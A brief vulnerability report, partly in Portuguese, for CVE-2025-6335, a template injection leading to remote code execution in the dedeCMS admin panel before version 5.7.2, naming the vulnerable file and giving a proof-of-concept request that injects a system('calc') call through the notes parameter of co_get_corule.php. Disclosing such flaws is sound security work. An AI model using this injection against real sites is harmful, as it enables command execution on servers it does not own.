
relatório cve
BUG_Author: Ewoji
Affected Version: dedeCMS < 5.7.2
Vendor: Shanghai Zhuozhuo Network Technology Co., LTD
Software: dedeCMS
Vulnerability Files:
/include/dedetag.class.phpApós a instalação, faça login no painel de administração
Explorando o Template
Verificando a Exploração:
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Accessing twice like this can execute the command
detalhe:CVE-2025-6335-Injeção de Template no Painel do dedeCMS - RCE